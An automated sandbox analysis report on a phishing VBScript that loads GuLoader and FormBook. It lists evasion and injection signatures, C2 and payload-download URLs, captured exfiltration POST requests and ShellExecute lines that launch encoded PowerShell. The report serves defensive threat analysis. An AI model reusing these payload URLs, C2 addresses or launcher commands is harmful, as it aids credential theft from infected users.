Windows Analysis Report
Remittance Information (MT-103).vbs

Overview

General Information

Sample Name: Remittance Information (MT-103).vbs
Analysis ID: 558870
MD5: d693624e3d9614a0dc9cf5a5cd1bb8ef
SHA1: 9c50c26e8b2f9c9acfa3192385df88d3144f351c
SHA256: dcc73a1351b6b79d48f7b42a96edfb142ffe46f896e1ab9f412a615b1edd7c9b
Tags: vbs

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Sigma detected: Suspect Svchost Activity
Yara detected GuLoader
Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Sample uses process hollowing technique
Potential evasive VBS script found (sleep loop)
Writes to foreign memory regions
Potential malicious VBS script found (has network functionality)
Very long command line found
Sigma detected: Suspicious Remote Thread Created
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.usyeslogistics.com/k6sm/"], "decoy": ["mingshengjewelry.com", "ontimecleaningenterprise.com", "alyssa0.xyz", "ptecex.xyz", "dukfot.online", "pvcpc.com", "iowalawtechnology.com", "nestletranspotation.com", "mysithomes.com", "greenlakespaseattle.com", "evofishingsystems.com", "unilytcs.com", "ordemt.com", "dentalbatonrouge.com", "pictureme360.net", "chalinaslacatalana.com", "newmirrorimage.xyz", "pinklaceandlemonade.com", "rapinantes.com", "yzicpa.com", "josephosman.com", "robsarra.com", "shumgroup.net", "flooringnewhampshire.com", "onceadayman.com", "audiomacklaunch.xyz", "hurryburry.com", "golfvid.info", "tutortenbobemail.com", "tatlitelasorganizasyon.com", "tqgtdd.space", "classicalruns.com", "xx3tgnf.xyz", "galwayartanddesign.com", "qidu.press", "crypto-obmennik.com", "dn360rn001.com", "tridim.tech", "phamhome.com", "mediadollskill.com", "loveatmetaverse.com", "electric4x4parts.com", "azulymargarita.com", "isadoramel.com", "rubyclean.com", "officiallydanellewright.com", "wu8d349s67op.xyz", "detetivepyther.com", "wondubniumgy463.xyz", "registry-finance3.com", "ultracoding.com", "open-4business.com", "supremelt.online", "pangfeng.xyz", "morneview.com", "northfloridapsychic.com", "kg4bppuh.xyz", "friv.asia", "epsilonhomecare.com", "hbina.com", "beachhutprinting.com", "sophoscloudoptix.net", "managemarksol.site", "palestyna24.info"]}
Source: 00000017.00000000.621139519.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin1"}
Source: Yara match File source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 151.106.117.33:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: Binary string: ieinstal.pdbGCTL source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ieinstal.pdb source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe Domain query: www.dentalbatonrouge.com
Source: C:\Windows\explorer.exe Domain query: www.yzicpa.com
Source: C:\Windows\explorer.exe Network Connect: 108.175.14.116 80
Source: Initial file: BinaryStream.SaveToFile NONN, 2
Source: Malware configuration extractor URLs: www.usyeslogistics.com/k6sm/
Source: Malware configuration extractor URLs: https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX2 HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bin_FlDFmmV154.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.bulkwhatsappsender.inCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /k6sm/ HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.dentalbatonrouge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dentalbatonrouge.com/k6sm/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii:
d48pAVX=dqRPJhpu8WWaLAXfgvEBLZtibEIw0MB8XbBBQiFlhSTkWMhHdUyqJhoEquFmpONU3oEP1-MauCKnWoIifrp1lYGJ90(_abpj5eaKDC0Y0C(7j25OJzIIhveaW8LHwG1oXWQvb5aQIOv7Lly74ah02qC2pKrgLaUpxDs7rC1i9B4vXNICXcdpIdLKMobRd21kml0gxCo1NZEvDT6Fmb5dpaBXwb0fBxxKj9M0CqDjoVhGLzKHhD47deBQv-LLE7IWsTjFkli-RGC8VEpWTFgFrvOieCPuNbwa4faqWNNo6MtowWOsf0RMlCl4RgovA-mo4DrBHo~MKJa7ADPhh2OPjr1PpDg8UpNWjKso5A8QbpHI(FoL77~GpH0VIgsdO_Yw1QTLe_TqC9vjczHu5vVKeRE.
Source: global traffic HTTP traffic detected: POST /k6sm/ HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeContent-Length: 180913Cache-Control: no-cacheOrigin: http://www.dentalbatonrouge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dentalbatonrouge.com/k6sm/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: PLUSSERVER-ASN1DE
Source: powershell.exe, 00000004.00000002.673929777.00000000081A0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661419330.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.659480092.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661232085.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.729620511.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.666505278.0000000005441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 0000001A.00000002.874553594.0000000002EAE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5e
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000018.00000000.704735877.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.687907955.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.666953603.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.756892182.000000000095C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: svchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpMicrosoftEdge_DNTExceptionLMEM8P
Source: svchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/?ocid=iehp
Source: svchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpD
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp
Source: svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874020367.00000000027D8000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: svchost.exe, 0000001A.00000003.748120365.0000000005D00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: svchost.exe, 0000001A.00000002.874464586.0000000002E90000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: svchost.exe, 0000001A.00000002.874316141.0000000002E0E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://madecosmetics.store/bin_FlDFmmV154.bin
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bulkwhatsappsender.in/bin_FlDFmmV154.binhttps://madecosmetics.store/bin_FlDFmmV154.bin
Source: svchost.exe, 0000001A.00000002.875610610.0000000003E1F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.dentalbatonrouge.com/k6sm/?d48pAVX=VId1XGgV51
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: svchost.exe, 0000001A.00000003.748120365.0000000005D00000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservi
Source: svchost.exe, 0000001A.00000002.874464586.0000000002E90000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0o
Source: unknown DNS traffic detected: queries for: www.bulkwhatsappsender.in
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown HTTP traffic detected: POST /k6sm/ HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.dentalbatonrouge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dentalbatonrouge.com/k6sm/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii:
d48pAVX=dqRPJhpu8WWaLAXfgvEBLZtibEIw0MB8XbBBQiFlhSTkWMhHdUyqJhoEquFmpONU3oEP1-MauCKnWoIifrp1lYGJ90(_abpj5eaKDC0Y0C(7j25OJzIIhveaW8LHwG1oXWQvb5aQIOv7Lly74ah02qC2pKrgLaUpxDs7rC1i9B4vXNICXcdpIdLKMobRd21kml0gxCo1NZEvDT6Fmb5dpaBXwb0fBxxKj9M0CqDjoVhGLzKHhD47deBQv-LLE7IWsTjFkli-RGC8VEpWTFgFrvOieCPuNbwa4faqWNNo6MtowWOsf0RMlCl4RgovA-mo4DrBHo~MKJa7ADPhh2OPjr1PpDg8UpNWjKso5A8QbpHI(FoL77~GpH0VIgsdO_Yw1QTLe_TqC9vjczHu5vVKeRE.

E-Banking Fraud

Source: Yara match File source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogri.ini
Source: C:\Windows\SysWOW64\svchost.exe Dropped file: C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogrv.ini
Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: Initial file: obj1.ShellExecute MyFile , RAVNEAGT ,"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", RAVNEAGT ,"","",0
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7837
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F2B28 26_2_034F2B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034EDBD2 26_2_034EDBD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0345EBB0 26_2_0345EBB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F22AE 26_2_034F22AE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0342F900 26_2_0342F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03444120 26_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034E1002 26_2_034E1002
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F28EC 26_2_034F28EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343B090 26_2_0343B090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034520A0 26_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F20A8 26_2_034F20A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F1FF1 26_2_034F1FF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034ED616 26_2_034ED616
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03446E30 26_2_03446E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F2EF7 26_2_034F2EF7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F1D55 26_2_034F1D55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F2D07 26_2_034F2D07
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03420D20 26_2_03420D20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034F25DD 26_2_034F25DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343D5E0 26_2_0343D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03452581 26_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034ED466 26_2_034ED466
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0343841F 26_2_0343841F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2E61F 26_2_02A2E61F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A19E60 26_2_02A19E60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A19E5B 26_2_02A19E5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A12FB0 26_2_02A12FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A12D88 26_2_02A12D88
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A12D90 26_2_02A12D90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Source: Remittance Information (MT-103).vbs Initial sample: Strings found which are bigger than 50
Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
